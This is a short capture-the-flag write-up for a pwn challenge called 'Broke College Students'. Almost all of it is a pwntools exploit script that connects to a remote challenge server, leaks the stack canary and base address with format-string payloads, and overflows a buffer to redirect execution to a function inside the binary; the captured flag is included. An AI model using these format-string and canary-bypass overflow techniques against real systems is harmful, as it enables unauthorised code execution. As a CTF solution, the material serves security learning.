For challenge file you can convert following from base64 [Broke College Students Base64.txt](https://gist.githubusercontent.com/ebubekirtrkr/880d3a856842bd1af050fe74ccd2794f/raw/54c55b82d1ab6b3db8d055eda6d299d048a22665/base64.txt)

## Solution script
```py
from pwn import *
from pwnlib.util.cyclic import cyclic, cyclic_find

context.log_level="debug"
context.terminal = ["tmux", "splitw", "-h"]

elf = ELF("./brokecollegestudents")
context.arch=elf.arch

p = remote("143.198.184.186", 5001)
#p = elf.process(aslr=True)

#gdb.attach(p,"b *catch+146\nb *catch+173\nc")

#LEAK CANARY
p.sendlineafter("Choice: ","1")
p.sendlineafter("===========================\n","1")
p.sendlineafter("CHOOSE: ","1")
payload="%9$p"
p.sendlineafter("name: ",payload)
p.recvuntil(b'0x')
canary = int("0x"+p.recv(16).decode(),16)

log.info("canary: "+hex(canary))

#LEAK ASLR ADDRESS
p.sendlineafter("Choice: ","1")
p.sendlineafter("===========================\n","1")
p.sendlineafter("CHOOSE: ","1")
payload="%lx."*230
payload="%47$p"
p.sendlineafter("name: ",payload)
p.recvuntil(b'0x')
base_address = int("0x"+p.recv(12).decode(),16)
base_address = base_address- elf.symbols["_start"]
log.info("base_address: "+hex(base_address))
elf.address=base_address

#BOF
p.sendlineafter("Choice: ","1")
p.sendlineafter("===========================\n","1")
p.sendlineafter("CHOOSE: ","1")
cannary_offset = cyclic_find("gaaa")
bof_offset = cyclic_find("caaa")
payload=cyclic(cannary_offset)+p64(canary)+cyclic(bof_offset)+p64(elf.symbols["shop"]+299)
p.sendlineafter("name: ",payload)
print(p.clean())

p.interactive()

"""
kqctf{did_you_resort_to_selling_NFTs_for_college_money_????}
"""

```